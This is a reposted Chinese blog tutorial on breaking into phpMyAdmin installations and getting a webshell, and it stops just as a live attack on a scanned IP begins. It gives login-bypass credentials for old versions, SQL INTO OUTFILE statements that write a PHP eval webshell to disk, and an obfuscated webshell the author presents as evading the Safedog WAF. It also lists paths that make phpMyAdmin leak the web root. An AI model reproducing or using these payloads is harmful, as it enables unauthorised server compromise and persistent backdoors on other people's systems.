分析PHPmyadmin漏洞以及拿shell的介绍-木庄网络博客

本文摘自PHP中文网，作者藏色散人，侵删。

下面由phpmyadmin教程栏目给大家介绍关于PHPmyadmin漏洞和拿shell，希望对需要的朋友有所帮助！

phpmyadmin的漏洞相对来说，还是比较多的，对于新手来说，分享几个漏洞，深入的处于代码审计方面的也可以和我讨论
phpmyadmin2.11.3-2.11.4 这两个版本存在万能密码，直接使用‘localhost’@'@”为账号，密码不用输入。

phpmyadmin2.11.9.2 这个版本存在空口令。直接root用户登陆，密码不用

找这个的话用自己的写的脚本，或者搜素引擎什么的，这里懂的人就懂了，不懂也不在这里。

关于拿shell，----》root权限，并且有写文件权限 ----》导出的目录有写权限 ----》有的情况下，就算你这两个都有，但是服务器的一些配置还是会对这个有影响。

在getshell之前先进入一个数据库

第一种，使用sql语句，创建一个表，添加一个字段，字段的内容为一句话，然后导出到php文件中，最后删除这个表，这个是最保险的方法
Create TABLE 表 (列 text NOT NULL)
Insert INTO 表 (列) VALUES('<?php eval($_POST[mima])?>')
select 列 from 表 into _utfile '路径'
Drop TABLE IF EXISTS 表;
第二种方法，这个是直接写入
select '一句话'INTO _UTFILE '路径'
还有几种方法，大致原理都一样。
然后，一般的话，一句话都是

1	`<span style="font-size: 16px;"><?php @eval($_POST[x])?><br></span>`

有狗的话，用免杀一句话，下面这个是我过年前构造的过狗一句话，现在应该还可以过

1	`<span style="font-size: 16px;"><?php<br>` `$a` `=` `'s';<br>` `$str` `=` `str_repeat($a,2);<br>` `$to` `=` `$_POST;<br>` `//echo $str;<br> $exp = 'a'.$str[0].$str[1].'e'.'r'.'t';<br> $exp($to['x'])<br> ?><br></span>`

找路径的话，

1// 利用phpinfo.php 2//利用phpmyadmin的一些文件报错，下面都是网上通用的 /phpMyAdmin/index.php?lang[]=1 /phpMyAdmin/phpinfo.php /load_file() /phpmyadmin/themes/darkblue_orange/layout.inc.php /phpmyadmin/libraries/select_lang.lib.php /phpmyadmin/libraries/lect_lang.lib.php /phpmyadmin/libraries/mcrypt.lib.php /phpmyadmin/libraries/export/xls.php 

3//再者就是利用网站包路径，这些会的都会了，不会的慢慢的就会了。

下面开始实战，脚本扫到一个IP，显示存在phpmyadmin，打开